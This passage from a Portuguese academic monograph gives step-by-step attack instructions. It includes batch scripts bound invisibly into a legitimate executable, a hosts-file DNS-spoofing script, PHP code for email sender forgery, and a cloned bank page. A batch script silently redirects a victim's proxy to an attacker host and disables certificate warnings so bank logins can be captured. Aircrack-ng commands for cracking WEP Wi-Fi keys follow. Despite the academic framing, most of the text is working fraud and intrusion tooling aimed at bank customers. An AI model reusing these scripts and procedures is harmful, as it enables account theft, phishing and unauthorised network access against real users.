@echo off rem Criado para fins acadêmicos por Pedro Ramos
@mkdir %homepath%\Windows
@move /y caveira.jpg %homepath%\Windows\System.jpg
@attrib +R +S +H %homepath%\Windows\System.jpg
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v Wallpaper
/t REG_SZ /d "%homepath%\Windows\System.jpg" /f
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v
WallpaperStyle /t REG_SZ /d 2 /f
@start Atlantis.exe
Há sete linhas de comando no arquivo (cada linha de comando começa com”@”) que são
suficientes para, de forma transparente, criar um diretório chamado “Windows” na pasta do
usuário que executar o programa, inserir o arquivo de imagem que servirá de plano de fundo
na área de trabalho (renomeado para “System.jpg”) dentro do novo diretório, ocultar e
proteger o novo arquivo, inserir alterações no registro para definir o papel de parede
impedindo ele seja alterado e, por último, executar o aplicativo original (Atlantis.exe).
53
Ao escolher a opção “Invisible application”, somente o batch será executado de forma
“transparente”, ou seja, o editor de textos “Atlantis” será executado e funcionará
normalmente, o que permite que o programa possa ser executado diversas vezes pelo usuário
sem que ele suspeite da integridade do arquivo.
Executar de forma invisível. Figura 25
Diversas outras opções são disponibilizadas pelo aplicativo e podem ser utilizadas de
acordo com a função do novo programa desenvolvido. A opção “Encrypt the program”, por
exemplo, pode ser útil quando a intenção é camuflar um vírus já conhecido e evitar que ele
seja detectado pelo programa antivírus. A inclusão de quaisquer arquivos como programas,
imagens e vídeos pode ser feita ao clicar na aba “Include”.
54
Da mesma forma que a imagem da caveira foi anexada, um vírus ou um programa que
registra as imagens da tela e teclas digitadas pelo usuário (image keylogger) também pode ser
adicionado, possibilitando a captura de senhas de contas bancárias digitadas em teclados
virtuais, por exemplo.
Incluir quaisquer arquivos ao programa. Figura 26
Caso seja necessário deixar o novo programa com a aparência bem parecida à do original,
a aba “Versioninformations” oferece algumas opções.
Incluir ícone. Figura 27
55
Após compilado, o resultado será o seguinte:
Comparação de arquivos. Figura 28
É possível verificar que o arquivo gerado pelo programa é pouco maior que o origina, pois
contém uma foto e um arquivo de batch O ícone utilizado também é pouco diferente, porém,
nada impede que um ícone idêntico seja utilizado.
4.2 DNS spoofing
O DNS, acrônimo de (Domain Name System), é um recurso utilizado para “traduzir”
nomes de computadores/servidores para seu real endereço lógico (endereço IP). Por exemplo,
o servidor que armazena o site de buscas “Google” possui um endereço (algo como
“72.14.253.104”) que o permite ser localizado na internet. Memorizar este endereço pode não
ser uma das tarefas mais simples quando se tratar de vários sites na internet, cada um com um
endereço diferente. Além disso, mesmo que o endereço de e-mail “[email protected]” seja
memorizado, caso ocorra uma mudança de servidor de correio eletrônico (por tornar-se
obsoleto, por exemplo) o endereço de e-mail será modificado. Para resolver esse problema
foram criadas listas contendo os nomes dos servidores e seus respectivos endereços
(TANENBAUM, 2003, p. 439).
O DNS spoofing, é a técnica que consiste em manipular os registros de DNS de uma
forma que a conexão seja direcionada para um local diferente do original. Há diversas
maneiras de manipular registros de DNS e, uma das mais conhecidas é manipular um arquivo
chamado “hosts”, presente em boa parte dos sistemas operacionais.
56
O código a seguir é um exemplo de como pode ser criado um arquivo de processamento
em lotes para manipular o arquivo “hosts” dos sistemas operacionais mais atuais da
Microsoft.
ipconfig /flushdns
echo. >>%systemroot%\System32\drivers\etc\hosts
echo 74.6.239.84 www.google.com>>%systemroot%\System32\drivers\etc\hosts
echo 74.6.239.84 www.google.com.br>>%systemroot%\System32\drivers\etc\hosts
Conforme visto nos capítulos anteriores, o código acima pode ser digitado em um editor
de texto qualquer e, após ser salvo com a extensão “.bat”, pode ser compilado para executar
de forma invisível e anexado a outro arquivo íntegro. Após sua execução, toda vez que o
usuário tentar acessar o site de buscas “www.google.com.br” ou “www.google.com”, será
direcionado para o site de buscas do “Yahoo” do Reino Unido e Irlanda do Norte, cujo
endereço atual é “74.6.239.84”. A figura abaixo foi originada de um ataque experimental real.
Redirecionamento do site. Figura 29
57
É importante ressaltar que mesmo durante o acesso ao site “Yahoo”, a barra de endereços
ainda continua a mostrar o endereço que o usuário desejava acessar. Da mesma forma que foi
possível direcionar para o “Yahoo”, um usuário que tentava acessar o “Google”, um código
semelhante ao que foi apresentado há pouco pode ser utilizado para direcionar um usuário que
queira acessar sua conta bancária ao computador de um cracker ou servidor por ele
manipulado. Caso um usuário seja direcionado para um site falso de uma instituição
financeira e o site for bem feito, dificilmente a pessoa a ser enganada desconfiará de uma
fraude. Caso o usuário que executar o arquivo malicioso tenha permissões de administrador
do sistema, dificilmente o direcionamento dos endereços não obterá êxito ou será bloqueado
por um firewall ou antivírus.
4.3 Fraude em contas bancárias
A invasão de contas bancárias talvez seja um dos golpes mais temidos por quem faz uso
da tecnologia para movimentações financeiras pela internet. Só no Brasil, estima-se que cerca
de 32,5 milhões de pessoas utilizam a internet para realizar transações bancárias (VALLE,
2010). Um ataque que atinja apenas um por cento deste público, afetará mais de 300 mil
pessoas. Mesmo que seja um ataque mal elaborado e de fácil percepção por parte do usuário
do sistema, caso consiga enganar apenas 0,01 por cento das pessoas afetadas pelo ataque,
mais de trinta usuários da internet poderão ter seu dinheiro roubado.
Uma grande variedade de técnicas é utilizada para cometer crimes digitais que envolvem
instituições financeiras e algumas delas já são bem conhecidas por grande parte das empresas
e usuários da internet, o que leva à conclusão de que, para um criminoso realizar um ataque
com sucesso, a combinação de técnicas é o modo mais eficiente.
Mesmo com grande investimento em segurança de informação feito por parte das
instituições financeiras, dificilmente é possível debelar crackers tenazes, o que leva a crer que
o investimento em conscientização dos usuários é uma boa medida de segurança.
4.3.1 Pharming
Um site falso é, atualmente, uma das ferramentas mais utilizadas por criminosos da
área de informática para enganar usuários da internet que acessam sites de instituições
financeiras. Uma das razões para a crescente prática desse tipo de crime é a facilidade com
58
que um site original pode ser copiado e a grande quantidade de usuários que são facilmente
induzidos a acessá-los. Dependendo da forma que foi desenvolvido e de sua complexidade,
muitas vezes é possível copiá-lo de forma integral, o que dificulta a percepção de que o site é
falso. Até mesmo sites mais complexos como sites de instituições financeiras e comércios
eletrônicos são passíveis de cópia, a partir de qualquer usuário da internet que utilize um
navegador comum como o “Internet Explorer”. Para exemplificar como isso pode ser feito,
foi copiado o site de uma instituição financeira.
No navegador “Internet Explorer” foi digitado o seguinte endereço: “www.bb.com.br”.
No menu “arquivos”, escolheu-se a opção “Salvar como...”
Salvar site. Figura 30
Após a escolha da opção “Salvar como...”, uma nova janela foi aberta com uma
mensagem dizendo que a página não poderia ser completamente salva e perguntando:
“Gostaria de salvar a página mesmo assim?”. Após clicar em “Sim” para a resposta à
pergunta, uma nova janela conforme a figura a seguir foi aberta.
59
Após o site ser copiado, foi aberto o arquivo “[bb_com_br].htm” e a página da
instituição foi exibida.
Página WEB completa. Figura 31
Até mesmo as fotos que estavam no site foram copiadas, como é possível verificar na
imagem a seguir.
Site falso. Figura 32
Nem todos os arquivos podem ser baixados desta maneira e a perfeição de um site falso
dependerá inteiramente da habilidade que o cracker tem em desenvolver sites e de sua
criatividade para modificar os itens que ele não consegue copiar com perfeição. Na imagem
60
do site falso, é possível verificar que os botões de menu que ficam logo abaixo dos locais
onde são inseridos os dados de agência e conta ficaram defeituosos. Muitos usuários não
suspeitariam que o site é falso somente por este motivo e, ainda assim, um cracker com
conhecimentos básicos de desenvolvimento de sites poderia facilmente consertar o problema.
As telas seguintes, que servem para a autenticação de um usuário em sua conta corrente,
também podem ser falsificadas por um bom desenvolvedor de sites (Web Disigner), inclusive
os teclados virtuais. É pertinente ressaltar também que um cracker não precisa desenvolver
um site por completo, pois é possível utilizar informações do site oficial e repassá-las para o
usuário em tempo real, conforme abordado em capítulos posteriores.
Após copiar e modificar o site para ter sua aparência mais parecida possível com o site
original, o cracker pode armazená-lo em um computador qualquer ou hospedá-lo em sites no
exterior. Algumas vezes são utilizadas contas falsas em sites gratuitos de hospedagem de sites,
a fim de aumentar a anonimidade do criminoso.
Um site falso que é exposto ao público da internet, rapidamente pode ser detectado e
tirado do ar (principalmente se for um site falso de uma grande instituição). Para evitar que o
site seja retirado do ar, um cracker pode utilizar diversos meios como, por exemplo, permitir
que somente endereços específicos (de clientes do banco) consigam acessar o site ou, em
outros casos, impedir somente que robôs dos sites de busca indexem o conteúdo do site. Para
impedir que os robôs dos sites de busca acessem o site, pode ser adicionada uma linha dentro
da página que contém o código fonte do site. O conteúdo abaixo é um exemplo do que pode
ser adicionado nas páginas com código fonte do site.
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
Caso o cracker tenha a intenção de não ter seu site indexado pelos sites de busca, também
é possível criar um arquivo chamado “robots.txt” com o conteúdo abaixo e coloca-lo no
diretório-raiz do site.
Conteúdo do arquivo “robots.txt”:
User-agent: * Disallow: /
Após a criação e hospedagem do site falso, o criminoso pode utilizar, entre outras
técnicas, a engenharia social para convencer o usuário a clicar em um link falso que remeta ao
site fake ou o DNS spoofing (abordado em capítulos anteriores) para que o cliente da
instituição financeira seja automaticamente direcionado ao site falso.
61
4.3.2 Phishing scam e e-mail spoofing
O phishing scam ou phishing, corruptela do verbo inglês fishing (pescar), é a prática
delituosa na internet que mais cresceu nos últimos anos. Consiste em enviar mensagens
eletrônicas com a finalidade de atraiçoar o destinatário e obter vantagens, comumente, a partir
da ingenuidade alheia. Para passar maior credibilidade à mensagem eletrônica e fazer o
destinatário crer que o remetente da mensagem é um amigo ou conhecido, frequentemente, o
endereço de e-mail do real remetente é alterado, prática esta, conhecida como e-mail spoofing.
(FILHO, 2008, p.1).
Há diversas formas de forjar o endereço do remetente de um e-mail. Uma delas é
utilizar serviços disponibilizados na internet. Um site que ainda funciona atualmente é o
holandês “http://www.anonymail.nl”.
Anonymail. Figura 33
62
Boa parte dos melhores sites que enviam e-mails anônimos ou com endereços forjados
ficam pouco tempo no ar e, quando não passam a cobrar pelos serviços, passam a enviar e-
mails com marcas d’água (que indica que o e-mail não é verdadeiro ou é anônimo).
Programas que fazem este serviço também podem ser baixados, porém, muitos deles
simplesmente param de funcionar depois de um tempo ou precisam ser comprados, além do
fato de muitas vezes serem distribuídos juntamente com vírus de computador.
Um cracker também pode, mesmo possuindo conhecimentos superficiais em
programação, desenvolver seu próprio software para envio de e-mails com endereço forjado,
utilizando apenas poucas linhas de código. Em “PHP” (acrônimo de “PHP: Hypertext
Preprocessor”), por exemplo, o seguinte código pode ser utilizado para enviar um e-mail com
o remetente alterado, apenas substituindo os termos em itálico. O código pode não funcionar
corretamente caso algum item que não esteja em itálico seja substituído.
<?php
mail("
[email protected]; [email protected]
","Assunto confidencial ","
Você acaba de ser premiado e tem 2 dias para receber o prêmio. Clique aqui para recebê-lo
","FROM:mamãe noel<[email protected]>");
echo "Sua mensagem foi enviada com sucesso!";
?>
Para enviar mais de um e-mail ao mesmo tempo, é preciso separá-los por um ponto e
vírgula e um espaço simples. A fim de fazer uso do código acima, o cracker pode realizar um
cadastro com dados falsos em algum serviço de hospedagem que suporte a linguagem “PHP”
e, além de enviar e-mails com o remetente falso, pode realizar a prática de spam. Os links
enviados no corpo do e-mail, também podem ser facilmente forjados, como no exemplo:
<a href="www.site-do-cracker.org"> www.show-do-milhão.com.br </a>
No modelo acima, quando o usuário clica em “www.show-do-milhão.com.br”, é
direcionado ao site “www.site-do-cracker.org”.
Sob a ótica das fraudes de cunho financeiro, a característica de um phishing scam é
possuir um conteúdo desenvolvido especialmente para coletar informações sigilosas (como
senhas) para um posterior logro. O phishing scam que visa a obtenção de vantagens
financeiras, frequentemente contém, além de endereços de e-mail e links forjados, imagens
reais da instituição e mensagens de cumprimento que fazem o destinatário pensar que o e-mail
63
é autêntico. Muitas vezes, são apenas e-mails que despertam a curiosidade do leitor (FILHO,
2008, p.1). Alguns destes e-mails, ao terem seus links clicados, instalam programas
maliciosos, como programas capazes de capturar autenticação bancárias (mesmo as que
utilizam teclado virtual e token). Alguns programas deste tipo (keyloggers) são executados de
forma invisível ao usuário, firewall e o antivírus e são capazes de enviar ao cracker, por e-
mail, toda a atividade realizada no computador, como teclas digitadas e imagens das telas. Um
poderoso keylogger pode ser facilmente adquirido e, muitos deles (como o “Ardamax”), não
exigem conhecimentos avançados em informática (não precisa ser um cracker) para utilizá-lo.
A instalação de um programa para fim malicioso também pode vir, até mesmo, sob o pretexto
de atualizações de segurança.
Outra forma de conseguir informações sigilosas através de um phishing scam que pode
ser eficiente, porém, aposta ainda mais na ingenuidade do destinatário, é enviar uma
mensagem eletrônica que diz ser necessário realizar alguma atualização cadastral e solicita
dados sigilosos.
4.3.3 Man In The Middle (MITM) e sequestro de sessão
O amplamente conhecido ataque Man In The Middle (homem no meio) é caracterizado
pela captura e visualização de pacotes que trafegam em uma rede, e a possível modificação ou
inserção de novos dados. O ataque Man In The Middle, devido a sua natureza, muitas vezes
permite explorar uma sessão válida (session hijacking ou sequestro de sessão), concedendo ao
atacante a possibilidade de interagir em tempo real com uma conexão criada pela pessoa que
está sendo atacada (BHANSALI, 2001, p. 2).
Diversos programas (como o “Juggernaut”, “T-Sight” e o “Hunt”) podem ser
utilizados para promover um ataque de sequestro de sessão (BHANSALI, 2001, p. 2). Alguns
programas, como servidores proxy, também podem ser utilizados para a finalidade. A função
básica de um servidor proxy é (apesar de muitos acharem que é a de um firewall ou de cache)
encaminhar o tráfego de uma rede para outra (RUFINO, 2002, p. 208), podendo ser utilizado
para, por exemplo, interceptar os dados de uma conexão. Neste trabalho, será exemplificado o
“sequestro” de uma sessão criada por uma instituição financeira com um de seus clientes.
Para isso, será utilizado o programa “Achilles v0.27”, pois, diferentemente de um servidor
proxy comum, ele também oferece a possibilidade de interagir com dados de conexões que
utilizam criptografia e certificados digitais (como sites de bancos). Outros programas mais
64
avançados ou com funções semelhantes – como o “Paros Proxy” – também podem ser
utilizados, porém, o “Achilles” é uma boa ferramenta para que pessoas que não possuem
conhecimentos técnicos em redes de computadores possam entender o funcionamento da
técnica.
Antes de realizar um ataque Man In The Middle é necessário configurar algumas
opções no programa “Achilles”.
Achilles. Figura 34
As configurações feitas foram:
- Configuração de porta. Foi escolhida a porta 443, porém, outras portas (como a 8080)
podem ser selecionadas.
- Em “Intercept Modes”, foram desmarcadas todas as opções, exceto a “Intercept mode ON”,
para interceptar os dados, e a “Ignore .jpg/.gif”, para não interceptar a transferência de dados
relativos a alguns tipos de imagens.
- Na opção “Cert File”, foi escolhido um certificado falso, porém, o certificado de exemplo
que vem junto com o programa também pode ser utilizado. O único problema é que aparecerá
65
uma janela de alerta ao usuário, dizendo que há um problema com o certificado, não
atrapalhando no funcionamento do programa (ver figura 40).
- Foi clicado no botão com a letra “C” para abrir a janela “Cliente Data Window”, que será a
janela onde aparecerão os dados interceptados.
Configurações terminadas, o botão com o desenho de um triângulo (play) foi acionado
para colocar o servidor em funcionamento.
No computador do usuário, para que o tráfego seja direcionado à máquina onde o
servidor está sendo executado, as configurações de proxy da vítima deve ser alterada. As
configurações podem ser realizadas na grande maioria dos navegadores atuais e, geralmente,
são de fácil entendimento No navegador “Internet Explorer”, por exemplo, o caminho é o
seguinte: “Ferramentas”, “Opções da Internet”, “Conexões” e, ao clicar em “Configurações da
LAN”, é exibida a seguinte tela.
Configurar proxy. Figura 35
Na Janela “Local Area Network (LAN) Settings”, ou, em português, “Configurações
66
da Rede Local (LAN)”, as opções para detectar automaticamente as configurações e utilizar
um servidor proxy devem ser selecionadas. O endereço e porta (mesma porta que foi
configurada no “Achilles”) do servidor proxy devem ser preenchidos.
Após estas configurações, caso a conectividade entre o servidor e o cliente esteja
normal e não ocorra nenhum imprevisto, o tráfego já começa a ser redirecionado e
interceptado. Caso não seja possível obter acesso físico ao computador da vítima, pode ser
criado, a partir de um batch, um programa que executa a configuração de forma invisível
(exemplificado em tópicos anteriores). O conteúdo de um arquivo de execução em lotes que
configura o proxy de forma automática pode ser o seguinte:
@echo off rem Criado para fins acadêmicos por Pedro Ramos
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
MigrateProxy /t Reg_DWord /d 1 /f
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
ProxyEnable /t Reg_DWord /d 1 /f
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
ProxyHttp1.1 /t Reg_DWord /d 0 /f
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
ProxyServer /t REG_SZ /d 192.168.2.70:443 /f
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
WarnonBadCertRecving /t Reg_DWord /d 0 /f
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
WarnOnPostRedirect /t Reg_DWord /d 0 /f
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
WarnOnZoneCrossing /t Reg_DWord /d 0 /f
@reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
PrivDiscUiShown /t Reg_DWord /d 1 /f
@reg add "HKCU\Software\Microsoft\Windows\Internet Explorer\IntelliForms" /v AskUser /t
Reg_DWord /d 0 /f
@reg add "HKCU\Software\Microsoft\Windows\Internet Explorer\InformationBar" /v
FirstTime /t Reg_DWord /d 0 /f
Todos os comandos começam com “@” e devem ser digitados, cada um, em uma
única linha. Caso seja executado um batch com estes comandos, além de alterar o registro do
67
Windows para que o proxy seja configurado de forma automática, algumas opções de
segurança também são alteradas para que o ataque seja concretizado com maior facilidade.
Apenas o comando que contém o servidor e a porta (192.168.2.70:443) devem ser alterados
para o servidor e porta correspondentes ao servidor proxy do atacante. Como visto
anteriormente, também pode ser criado e enviado por e-mail um programa que execute
comandos de forma invisível.
Após a configuração do cliente e servidor, em um site de busca na internet, de forma
aleatória, foram escolhidos os dados de agência e conta corrente de um cliente de um banco,
somente para utilizar como exemplo neste trabalho e obter acesso até a parte que exibe o
teclado virtual.
Dados de agência e conta corrente. Figura 36
Após escolher aleatoriamente o número de uma agência e conta corrente, foi acessado
o site da instituição financeira em questão e, com o “Achilles” capturando os dados, foi feita
uma tentativa de acesso. Foram digitados os dados de agência e conta corrente e, assim que o
botão “OK” foi selecionado, os dados foram capturados pelo aplicativo.
68
Dados capturados. Figura 37
Após a confirmação dos dados de agência e conta, foi instalado um módulo de
proteção exigido pelo site e, ao clicar no nome do usuário, foi exibido um teclado virtual.
Teclado virtual. Figura 38
Apenas para verificar a eficiência do processo de captura de senha, foi digitado um
69
número qualquer (888888). Como esperado, o sistema não aceitou o código digitado e não foi
possível o acesso, porém, se a senha estivesse correta, seria capturada pelo aplicativo.
Como é possível verificar, o fato de aparecer cadeados de segurança e “https” na barra
de endereços, não representa garantia totalmente eficaz de que os dados não estão sendo
interceptados.
Tela de interceptação de dados do cliente. Figura 39
Não foram realizados testes de captura de dados de tabela de senhas ou tokens, porém,
mesmo com protocolos de criptografia sendo utilizados, como visto anteriormente, os dados
provenientes do cliente podem ser capturados em formato de texto simples, posto que, quem
realmente estabelece a comunicação com o site da instituição financeira é a máquina que
executa o servidor proxy. Além disso, também é importante salientar que um cracker pode
utilizar várias técnicas em conjunto com a finalidade de realizar um ataque bem sucedido.
Para interagir em tempo real com os dados interceptados pelo “Achilles”, alterando,
excluindo ou inserindo novos dados, as opções “Intercept Client Data” e/ou “Intercept Server
70
Data” devem ser selecionadas. Para modificar os dados da conexão em um ataque deste tipo,
deve-se levar em conta que os dados provenientes da instituição financeira serão interceptados
de forma criptografada e dificilmente poderão ser feitas alterações de uma forma consciente.
Um dos maiores obstáculos que um cracker pode encontrar para realizar um ataque
deste tipo, é, talvez, o certificado de segurança. Neste ataque, caso seja utilizado um
certificado inválido, um alerta semelhante ao da imagem a seguir será exibido ao usuário.
Tela de alerta. Figura 40
Além de levantar suspeitas, com o certificado inválido, a conexão fica extremamente
lenta em sites de alguns bancos e em outros, nem mesmo é possível o acesso.
A criação de certificados (como um self-signed fake certificate) pode ser muito útil
para a utilização de programas como o “Paros Proxy” ou o “Achilles”, visto que, a grande
maioria dos sites que têm alguma relação com instituições financeiras utilizam certificados
digitais. Existem programas disponibilizados de forma gratuita na internet capazes de criar
certificados, como por exemplo, o “OpenSSL”. Os códigos abaixo servem como um exemplo
de utilização do “OpenSSL” para a criação de uma chave.
openssl req \
-new -newkey rsa:1024 -nodes \
-subj '/CN=www.site_de_acesso_vitima.com/O=Meu Dom, Inc./C=BR/ST=SP/L=sao paulo' \
-keyout mykey.pem -out myreq.pem
Somente a digitação dos comandos do exemplo não será suficiente para a criação de
71
um certificado válido, sem que outras opções sejam alteradas.
4.4 Quebra de senhas de redes sem fio
A comunicação feita entre computadores que utilizam ondas de rádio para a
transferência de dados, tecnologia que também é conhecida como Wi-Fi, Wireless, WLAN ou
IEEE 802.11, por mais que evolua, sempre utilizará um meio comum (o ar) para a comutação
de pacotes. Atualmente, as formas mais utilizadas para proteção por senha de uma rede sem
fio (tecnologias WEP, WPA e WPA2) são extremamente vulneráveis e permitem que as senhas
sejam descobertas por alguém que esteja fisicamente próximo à conexão ou possua aparelhos
mais potentes que podem capturar redes distantes. Muitas vezes, o único fator de
impedimento da descoberta de uma senha é o poder de processamento do computador da
pessoa que interceptou os dados encriptados, pois, senhas melhor elaboradas podem levar um
tempo maior para que sejam descobertas. Boa parte das senhas hoje utilizadas podem ser
descobertas em questão de minutos por um computador doméstico comum.
Descobrir a senha de uma rede sem fio pode trazer diversos benefícios para alguém
com más intenções. Além dos fatores óbvios, como a possibilidade de utilizar a internet de
forma gratuita ou visualizar/alterar os arquivos dos computadores de uma rede, a utlização de
uma rede de outra pessoa pode trazer maior anonimidade para alguém que queira cometer um
crime pela internet, evitando que o criminoso seja encontrado.
Para exemplificar como pode ser feita a “escuta” de uma rede sem fio – e também
descobrir senhas – será utilizado um conjunto de ferramentas, todas elas disponíveis na
distribuição do Linux, especialmente criada para testes de “penetração” (pentest), chamada
“BackTrack 4 R-1” pelo fato da distribuição possuir todas as ferramentas necessárias e já
configuradas, além de possuir grande quantidade de drivers para dispositivos Wi-Fi.
4.4.1 Captura de tráfego
Boa parte dos dispositivos de rede sem fio utilizados atualmente suporta uma forma de
operação conhecida como “RFMON” (acrônimo de Radio Frequency Monitor) chamado
também de “modo monitor” ou ainda, “modo promíscuo”. Esta forma de operação permite
que um computador que possui uma interface Wireless possa capturar, de forma passiva, todo
o tráfego oriundo de redes sem fio que trafegam pelo meio (o ar). Alguns dispositivos
72
permitem também a interação com outros dispositivos de rede, como a possibilidade de enviar
pacotes e realizar autenticações falsas.
Diversas ferramentas, para diferentes sistemas operacionais e disponibilizadas de
forma gratuita na internet, são capazes de controlar uma interface de rede sem fio para que ela
possa operar em modo passivo. No exemplo a seguir, serão utilizadas as ferramentas
“Airmon-ng” e “Airodump-ng”.
No console de comando do “BackTrack”, o comando “airmon-ng” pode ser digitado
para visualizar os dispositivos de rede sem fio conectados e os nomes das interfaces.
Interfaces. Figura 41
Na imagem acima, é possível verificar que o computador possui apenas um adaptador
de rede sem fio suportado pelo sistema. O dado proveniente deste comando que será utilizado
posteriormente é o nome da interface que, neste caso, é “wlan0”.
Diversos dispositivos podem possuir particularidades para funcionar de forma
eficiente. Por exemplo, existem dispositivos que necessitam da instalação de drivers ou
comandos especiais para configurar o dispositivo de rede antes de iniciar a captura de pacotes.
De qualquer forma, na internet podem ser encontradas informações diversas sobre
dispositivos específicos.
Em boa parte dos dispositivos, para ativar o modo monitor, o comando “airmon-ng
start nome_da_interface” deve ser digitado. Neste caso, os parâmetros são “airmon-ng start
wlan0”.
73
Habilitar modo monitor. Figura 42
Após a ativação do modo monitor, para verificar as informações das redes mais
próximas, pode ser digitado o comando “airodump-ng interface”.
Airodump-ng. Figura 43
Na figura 43 é possível verificar que o dispositivo de rede sem fio, de forma passiva,
monitora o tráfego da rede de três pontos de acesso em diferentes canais e exibe informações
referentes ao tráfego, tipo de segurança utilizada e seus respectivos endereços físicos.
A partir das informações verificadas com o comando anterior, o atacante pode escolher
uma ou mais redes e capturar informações de redes específicas adicionando os seguintes
parâmetros (sem as aspas):
-Escolha de canal “-c”.
-Salvar dados capturados “-w”.
-Escolha de ponto de acesso “--bssid” ou “--essid”.
O “airodump-ng” oferece diversas outras opções de monitoramento ou captura além
74
das citadas, porém, apenas para capturar e armazenar os dados trafegados em uma rede
específica, as mencionadas já são suficientes.
Para capturar somente o tráfego da rede “Elza e Ale” e salvá-lo em um arquivo de
texto, por exemplo, foi digitado o comando “airodump-ng –w dados –bssid
00:22:b0:46:10:89 –c 6 wlan0”
Salvar pacotes capturados. Figura 44
No exemplo da imagem acima, independentemente do tipo de criptografia de
segurança utilizada, os dados da rede selecionada serão capturados e salvos em um arquivo
chamado “dados-01.cap”.
4.4.2 Como quebrar senhas WEP
O protocolo de segurança Wired Equivalent Privacy, mais conhecido pelo seu
acrônimo, “WEP”, foi criado para prover maior segurança em redes sem fio e evitar que
dados em formato de texto sejam capturados. Para isso, foi feito o uso de criptografia. Um dos
maiores problemas com a implementação deste tipo de protocolo de segurança é o fato de ele
utilizar a mesma senha da rede sem fio para criptografar os dados, transmitir parte da senha
pelo meio de comunicação (o ar) e a fragilidade do algoritmo de criptografia utilizado, o RC4
(FILHO, 2009).
Em uma conexão que utiliza o protocolo WEP, cada pacote que é enviado contém 24
bits que fazem parte da chave secreta, anexados ao vetor de inicialização (IV), permitindo a
alguém que capture mais de cinco mil pacotes possa encontrar repetições que levam a
descobrir a chave por completo (ataque de aniversário). Em outras palavras, caso seja possível
75
capturar cerca de 5000 pacotes, o que é possível em alguns segundos com o uso de
ferramentas para aumentar o tráfego da rede, já há a possibilidade de descobrir a senha de
uma rede sem fio. (FILHO, 2009).
De posse dos pacotes da rede sem fio que foram capturados, é necessário apenas um
comando para que a senha de uma rede que utiliza o protocolo WEP seja quebrada. O
comando “aircrack-ng -z -b mac-do-ap dados-capturados” utiliza o ataque chamado PTW
(iniciais dos nomes dos criadores, Andrei Pychkine Erik Tews e Ralf-Philipp Weinmann) e é
capaz de descobrir uma senha em questão de segundos. Após a captura de 25970 vetores de
inicialização, para quebrar a senha da rede que serve de exemplo para este trabalho, o seguinte
comando foi digitado:
aircrack-ng -z -b 00:22:b0:46:10:89 dados*.cap
Resultados do ataque PTW. Figura 45
Na imagem acima, é possível verificar a senha em número hexadecimal e em formato
de texto (ASCII). Também foi informado que há cem por cento de chance de a senha estar
correta, indicando que não há possibilidades de a cifra encontrada ser um falso positivo.
76
4.4.2.1 Como fazer autenticação falsa e acelerar o tráfego
Caso um ponto de acesso não seja muito utilizado, pouco tráfego será gerado e poucos
pacotes poderão ser capturados. A rede que foi utilizada para elaborar esta monografia, por
exemplo, não possuía nenhum cliente conectado e, sem a utilização de outras técnicas, o
processo de captura seria extremamente duradouro ou não seria possível quebrar a senha. Para
solucionar este problema, foi criado um tráfego entre o próprio dispositivo atacante e o ponto
de acesso. A fim de obter maiores chances de sucesso no processo de injeção de pacotes, uma
autenticação falsa foi criada com o comando:
Aireplay-ng -1 30 –e “Elza e Ale” –a 00:22:b0:46:10:89 –h 00:15:af:04:4c:8f wlan0
“Elza e Ale”, corresponde ao nome do ponto de acesso, “00:22:b0:46:10:89”, o
endereço físico e “00:15:af:04:4c:8f” é o endereço do dispositivo que se conectou ao roteador.
Autenticação falsa. Figura 46
Caso seja necessário manter o anonimato sobre o endereço físico do dispositivo sem
fio que fará a conexão falsa e a injeção de pacotes, o seguinte comando pode ser digitado
antes da autenticação para alterá-lo:
“macchenger –mac endereço_novo interface”
Modificar o MAC. Figura 47
77
O aplicativo “aireplay-ng” possui diversas opções de ataque que podem ser utilizadas
de acordo com cada situação em específico. Uma forma de ataque que funciona em boa parte
dos casos e é de extrema eficiência, é injetar pacotes forjados pelo programa “packetforge-
ng”. Antes de criar um pacote forjado, é necessário realizar um procedimento para criar uma
série de combinações randômicas de caracteres para produzir uma chave criptografada válida
(uma keystream). Com o próprio “aireplay-ng”, é possível criar uma keystream válida, ao
digitar os seguintes parâmetros com a autenticação falsa ainda ativa:
“aireplay-ng -5 -b mac_do_ap -h mac_do_atacante interface”
Após a substituição dos termos em itálico, o comando ficou da seguinte forma:
aireplay-ng -5 -b 00:22:b0:46:10:89 -h 00:1f:1f:10:bb:5a wlan0
Assim que os parâmetros acima são digitados, é gerado um arquivo com a extensão
“.xor”. O arquivo criado para o exemplo ficou com o nome “fragment-1114-21538.xor” e
posteriormente foi utilizado para criar um pacote forjado a partir da sintaxe “packetforge-ng -
0 -a mac_do_ap -h mac_do_atacante -k 255.255.255.255 -L 255.255.255.255 -y arquivo(xor)
-w pacote”. No exemplo real, os seguintes parâmetros foram digitados:
packetforge-ng -0 –a 00:22:b0:46:10:89 –h 00:1f:1f:10:bb:5a –k 255.255.255.255 –L
255.255.255.255 –y *.xor –w pacote
É pertinente ressaltar que, antes de realizar a injeção de pacotes, caso o atacante queira
aumentar sua anonimidade, é necessário fazer a troca do endereço físico do dispositivo de
rede que enviará os pacotes.
Criar e enviar pacotes forjados. Figura 48
78
Imediatamente após a digitação do comando “aireplay-ng -2 –r pacote wlan0”,
aparecerá uma mensagem exibindo o pacote que será enviado e perguntando se ele realmente
deverá ser utilizado, além de informações de origem e destino do pacote.
Enviando pacotes forjados. Figura 49
Após a concretização dos procedimentos que foram abordados neste tópico, em
condições normais, uma enorme quantidade de pacotes é enviada ao ponto de acesso (cerca de
500 pacotes por segundo), possibilitando que a senha de uma rede sem fio que utiliza o
protocolo WEP seja descoberta em poucos minutos.
4.4.3 Descoberta de senhas WPA/WPA2
Após evidenciada a extrema fragilidade do protocolo WEP, a necessidade da criação
de um novo protocolo de segurança torna-se clara. O Wi-Fi Protected Access (WPA),
diferentemente do WEP, utiliza algoritmos mais complexos de criptografia, além de fazer a
difusão da chave criptografada somente durante o processo de autenticação, chamado de Four
